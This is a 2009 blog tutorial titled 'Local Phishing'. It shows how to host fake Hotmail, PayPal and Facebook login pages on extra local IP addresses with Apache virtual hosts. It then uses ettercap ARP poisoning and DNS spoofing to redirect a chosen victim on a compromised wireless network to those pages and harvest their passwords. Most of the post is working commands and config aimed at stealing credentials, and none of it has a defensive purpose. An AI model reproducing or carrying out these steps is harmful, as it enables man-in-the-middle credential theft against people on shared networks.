Sep 1, 2009

Local Phishing

 Local Phishing
 I'v never seen a tutorial on how to do this so I figured I'd make one.

Ok so you may be asking whats the point of this? Well let me tell you.

Say you broke into a wireless network and want to get some passwords.
You arp poison your victims and use an ssl stripping tool to be able to sniff passwords.
The target gets tipped off by the certificate warning. So you fail.
So you want to dsn spoof your target to a phisher.
But the problem is that you can only dns spoof to an ip address.
This means you cannot spoof them to a phisher on a free hosting domain.
You set up apache hosting your phisher and dns spoof them to your local ip.
This is great, but you're limited to only one phisher.
This tutorial will show you how to set up multiple Ip's and the set up virual hosts in apache for those ips.


Step 1: Set multiple IP's

Let's make 3. (you can have as many as you want)

Code:
sudo ifconfig wlan0:1 up 192.168.1.123
sudo ifconfig wlan0:2 up 192.168.1.124
sudo ifconfig wlan0:3 up 192.168.1.125
Some times it will give you an error like this.

Code:
SIOCSIFFLAGS: Cannot assign requested address
If you just type in the same command again it should work

Ok now check if they're up

Code:
sudo ifconfig -a
you should see your new virtual interfaces. (wlan0:1, wlan0:2, wlan0:3)

Step 2: Set up apache

Code:
sudo nautilus /var/www/
Create 3 folders, one for each phisher. I'll be using hotmail, paypal and facebook.

/var/www/hotmail/
/var/www/paypal/
/var/www/facebook/

put you phishers in those folders.
(When I do this I edit my phishers so they all write to one log file so it's easier to keep track of what you got.)

Now you need to edit the apache2.conf file.
Code:
sudo nautilus /etc/apache2/sites-enabled/
Open the configuration file in there (mine was called 000-default).
Now you need to add a virtual host entry for every one of your ip addresses.
Make sure to change the ServerName and DocumentRoot to match your setup.
In my case i'll add three. (You add these to the bottom of the file)

Code:

ServerName 192.168.1.123
DocumentRoot /var/www/facebook/



ServerName 192.168.1.124
DocumentRoot /var/www/paypal/



ServerName 192.168.1.125
DocumentRoot /var/www/phish/hotmail/
Start apache

Code:
sudo /etc/init.d/apache2 start
Open up firefox and browse to each one of your ips and make sure the phishers come up.

Step 3: Dns spoof/Arp poison with ettercap

Backup the dns_spoof configuration file

Code:
sudo mv /usr/share/ettercap/etter.dns /usr/share/ettercap/etter.dns.backup
Edit the file

Code:
sudo echo "www.facebook.com A 192.168.1.123" >> /usr/share/ettercap/etter.dns
sudo echo "www.paypal.com A 192.168.1.124" >> /usr/share/ettercap/etter.dns
sudo echo "www.hotmail.com A 192.168.1.125" >> /usr/share/ettercap/etter.dns
Start ettercap arp poison with the dns_spoof plugin

Code:
sudo ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof
replace 192.168.1.102 with your target's ip.
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.
# ITS ©
# 2008 - 2009

No comments:

Post a Comment